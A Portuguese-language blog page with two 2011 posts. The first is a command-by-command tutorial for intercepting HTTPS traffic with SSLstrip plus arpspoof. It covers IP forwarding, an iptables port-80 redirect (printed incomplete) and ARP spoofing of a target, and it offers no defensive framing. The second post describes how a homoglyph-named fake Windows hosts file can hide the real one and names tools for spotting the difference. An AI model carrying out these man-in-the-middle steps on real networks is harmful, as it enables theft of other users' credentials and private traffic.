terça-feira, 8 de novembro de 2011

SSLSTRIP

O SSLSTRIP é uma ferramenta capaz de capturar e "ler" todo o tráfego SSL que por ele passar...

Baixe:
wget www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

Instale o Twisted Web:
apt-get install python-twisted-web

Descompacte:
tar -zxvf sslstrip-0.9.tar.gz

Ative o roteamento em seu equipamento:
echo "1" > /proc/sys/net/ipv4/ip_forward

Faça o redirecionamento da porta 80:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port

Execute o sslstrip:
sslstrip.py -l [suaporta]

Instale o ArpSpoof através do pacote dsniff:
apt-get install dsniff

Rode o arspoof para redirecionar o tráfego para seu equipamento:
arpspoof [-i interface] [-t target] host

Fonte:
http://www.thoughtcrime.org/software/sslstrip/

domingo, 4 de setembro de 2011

Arquivos "iguais" !


Dois arquivos exatamente iguais para os nossos olhos:


Mas não para o mapa de caracteres e para leitores hexadecimais :-)



Imaginem se houvessem dois arquivos hosts (%SystemRoot%\system32\drivers\etc\hosts) em seu Windows, um falso com a letra o (0x043E) e um verdadeiro porém oculto com a letra o (0x006F).


Para quem não sabe o que o arquivo hosts faz, sugiro uma pequena leitura:
http://www.linhadefensiva.org/2005/02/hosts/


Seguem duas ferramentas que podem servir de ajuda para comparar arquivos destes tipo:
Cygnus
Hiew


Fonte:
http://www.microsoft.com/brasil/technet/security/bulletin/ms11-068.mspx